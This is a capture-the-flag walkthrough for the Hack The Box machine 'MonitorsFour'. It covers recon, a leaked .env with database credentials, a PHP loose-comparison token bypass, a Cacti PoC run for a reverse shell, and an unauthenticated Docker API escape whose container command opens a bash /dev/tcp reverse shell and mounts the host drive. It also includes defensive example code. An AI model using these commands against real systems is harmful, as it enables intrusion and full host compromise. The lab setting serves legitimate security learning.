htb monitorsfour

Recon

# Nmap 7.95 scan initiated Sun Dec  7 20:24:32 2025 as: /usr/lib/nmap/nmap --privileged -Pn -p80,5985 -sC -sV -oA ./Recon/10.10.11.98 10.10.11.98
Nmap scan report for monitorsFour.htb (10.10.11.98)
Host is up (0.076s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: MonitorsFour - Networking Solutions
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec  7 20:24:45 2025 -- 1 IP address (1 host up) scanned in 13.18 seconds
# Dirsearch started Sun Dec  7 20:31:17 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://monitorsfour.htb

200    97B   http://monitorsfour.htb/.env
403   548B   http://monitorsfour.htb/.ht_wsr.txt
403   548B   http://monitorsfour.htb/.htaccess.orig
403   548B   http://monitorsfour.htb/.htaccess.bak1
403   548B   http://monitorsfour.htb/.htaccess.save
403   548B   http://monitorsfour.htb/.html
403   548B   http://monitorsfour.htb/.htm
403   548B   http://monitorsfour.htb/.htaccess_sc
403   548B   http://monitorsfour.htb/.htaccessBAK
403   548B   http://monitorsfour.htb/.htaccessOLD
403   548B   http://monitorsfour.htb/.htaccess.sample
403   548B   http://monitorsfour.htb/.htaccess_extra
403   548B   http://monitorsfour.htb/.htaccess_orig
403   548B   http://monitorsfour.htb/.htaccessOLD2
403   548B   http://monitorsfour.htb/.htpasswd_test
403   548B   http://monitorsfour.htb/.httr-oauth
403   548B   http://monitorsfour.htb/.htpasswds
200   367B   http://monitorsfour.htb/contact
403   548B   http://monitorsfour.htb/controllers/
200     4KB  http://monitorsfour.htb/login
301   162B   http://monitorsfour.htb/static    -> REDIRECTS TO: http://monitorsfour.htb/static/
200    35B   http://monitorsfour.htb/user
301   162B   http://monitorsfour.htb/views    -> REDIRECTS TO: http://monitorsfour.htb/views/

Contents of .env:

DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r

Virtual host fuzzing:

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt \
     -u http://monitorsfour.htb/ -H 'host: FUZZ.monitorsfour.htb' -fw 3
--> cacti

Web

Inspecting the site turns up a vulnerability; CVE-2025-24367 will also be needed.

image 104.png

  • Check whether the token parameter exists
  • Check whether the token parameter is valid

Try a loose-comparison test on the token: the backend compares tokens with ==. The following list can be used as a reference:

0
1
true
false
null
""
''
[]
0e1234
0e999999
0000
00
0.0

This dictionary can be used for fuzzing; the 0e entries are scientific notation.
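To see why == makes this dictionary effective and why the fix is a strict comparison, here is an added Python model of PHP's string == rules (example code written for this writeup, not taken from the target application or any PoC); the stored token value and the hex-digest assumption are constructed.

```python
import re

# Shape of a PHP numeric string: optional whitespace and sign, integer or
# decimal digits, optional exponent. "0e1234" matches (0 * 10**1234 == 0).
_PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_is_numeric_string(s: str) -> bool:
    return _PHP_NUMERIC.match(s) is not None


def php_loose_eq(a: str, b: str) -> bool:
    """Model PHP's == on two strings: two numeric strings compare as numbers,
    anything else compares byte for byte."""
    if php_is_numeric_string(a) and php_is_numeric_string(b):
        return float(a) == float(b)
    return a == b


def php_strict_eq(a: str, b: str) -> bool:
    """PHP === or hash_equals(): only identical byte strings are equal."""
    return a == b


# Constructed stored token: a hex digest that starts with "0e" and continues
# with digits only, so PHP's == parses it as the number zero.
STORED_TOKEN = "0e12345678901234567890123456789"

# The fuzz dictionary from the writeup as it arrives in a string parameter
# (the quoted-string entries become "" and [] becomes an array, so they are
# not separate strings here).
FUZZ_DICT = ["0", "1", "true", "false", "null", "", "0e1234", "0e999999",
             "0000", "00", "0.0"]


def matches(stored: str, candidates, cmp) -> list:
    """Candidates that comparison function `cmp` accepts as equal to `stored`."""
    return [c for c in candidates if cmp(stored, c)]


if __name__ == "__main__":
    print("==  accepts:", matches(STORED_TOKEN, FUZZ_DICT, php_loose_eq))
    print("=== accepts:", matches(STORED_TOKEN, FUZZ_DICT, php_strict_eq))
```

Under == six of the eleven entries pass as the token; under === (or hash_equals()) none do, which is the one-line fix for this class of bug.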

This yields the credentials admin:wonderful1; logging in at monitorsfour.htb/login.php reveals the name Marcus Higgins.

Try the credentials marcus:wonderful1 on the virtual host.

Searching turns up a PoC (https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC/tree/main):

python3 exploit.py -u marcus -p wonderful1 -i 10.10.16.68 -l 4444 --url http://cacti.monitorsfour.htb

This gives a shell as www-data.

Foothold

ip a shows that we are inside a container.

Neither ssh nor su works for logging in as marcus, but user.txt is readable.

$ cat /etc/resolv.conf 
# Generated by Docker Engine.
# This file can be edited; Docker Engine will not make further changes once it
# has been modified.

nameserver 127.0.0.11
options ndots:0

# Based on host file: '/etc/resolv.conf' (internal resolver)
# ExtServers: [host(192.168.65.7)]
# Overrides: []
# Option ndots from: internal

The external server is 192.168.65.7.

PrivEsc

We can scan it from inside the container:

$ ./fscan-XRwlvVTi -h 192.168.65.7 -p 1-65535

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
192.168.65.7:53 open
192.168.65.7:2375 open
192.168.65.7:3128 open
192.168.65.7:5555 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://192.168.65.7:2375  code:404 len:29     title:None
[*] WebTitle http://192.168.65.7:5555  code:200 len:0      title:None
[+] PocScan http://192.168.65.7:2375 poc-yaml-docker-api-unauthorized-rce 
[+] PocScan http://192.168.65.7:2375 poc-yaml-go-pprof-leak 
已完成 4/4
[*] 扫描结束,耗时: 34.668920056s

This matches CVE-2025-9074.

curl -s http://192.168.65.7:2375/images/json shows which images are available; among them is docker_setup-nginx-php:latest.

{
  "Image": "docker_setup-nginx-php:latest",
  "Cmd": ["/bin/bash","-c","bash -i >& /dev/tcp/10.10.16.68/4444 0>&1"],
  "HostConfig": {
    "Binds": ["/mnt/host/c:/host_root"]
  }
}

Save the above as create_container.json, then create the container:

curl -H 'Content-Type: application/json' -d @create_container.json http://192.168.65.7:2375/containers/create -o response.json

Listen on port 4444, then extract the container id:

cid=$(grep -o '"Id":"[^"]*"' response.json | cut -d'"' -f4)

Start the container:

curl -X POST http://192.168.65.7:2375/containers/$cid/start
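A defender-side counterpart to the create request above, added here and not part of the writeup or of any Docker tooling: a policy check over a POST /containers/create body that flags the settings handing the host to the container (host path binds, privileged mode, host namespaces, a /dev/tcp command). The sensitive-path list and both sample requests are constructed.

```python
import json

# Host paths that should never be bind-mounted into an untrusted container
# (constructed list; /mnt/host is where Docker Desktop exposes the host's
# drives, which is what the request above mounts as /host_root).
SENSITIVE_HOST_PATHS = ("/mnt/host", "/var/run/docker.sock", "/etc", "/root",
                        "/proc", "/sys", "/dev", "/home")


def is_sensitive_source(src: str) -> bool:
    """True for the host root or any path at or below a sensitive prefix."""
    return src == "/" or any(src == p or src.startswith(p + "/")
                             for p in SENSITIVE_HOST_PATHS)


def audit_create_request(body: str) -> list:
    """Findings for a POST /containers/create JSON body; empty means clean."""
    req = json.loads(body)
    hc = req.get("HostConfig") or {}
    findings = []
    for bind in hc.get("Binds") or []:
        src = bind.split(":", 1)[0]      # 'src:dst[:opts]'; volume names have no '/'
        if is_sensitive_source(src):
            findings.append(f"host path bind: {bind}")
    if hc.get("Privileged"):
        findings.append("Privileged=true")
    for key in ("PidMode", "NetworkMode", "IpcMode"):
        if hc.get(key) == "host":
            findings.append(f"{key}=host")
    if "/dev/tcp/" in " ".join(req.get("Cmd") or []):
        findings.append("Cmd opens a /dev/tcp socket (reverse shell pattern)")
    return findings


# Constructed samples: the request shape used in the writeup and a benign one.
HOST_MOUNT_REQUEST = json.dumps({
    "Image": "docker_setup-nginx-php:latest",
    "Cmd": ["/bin/bash", "-c", "bash -i >& /dev/tcp/10.10.16.68/4444 0>&1"],
    "HostConfig": {"Binds": ["/mnt/host/c:/host_root"]},
})
BENIGN_REQUEST = json.dumps({
    "Image": "nginx:latest",
    "HostConfig": {"Binds": ["webdata:/usr/share/nginx/html:ro"]},
})

if __name__ == "__main__":
    for name, body in (("writeup", HOST_MOUNT_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, audit_create_request(body) or "clean")
```

The same check belongs in front of any daemon socket that is reachable from containers; with the API exposed on 2375 without TLS, as found here, nothing else stands between a container and the host.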
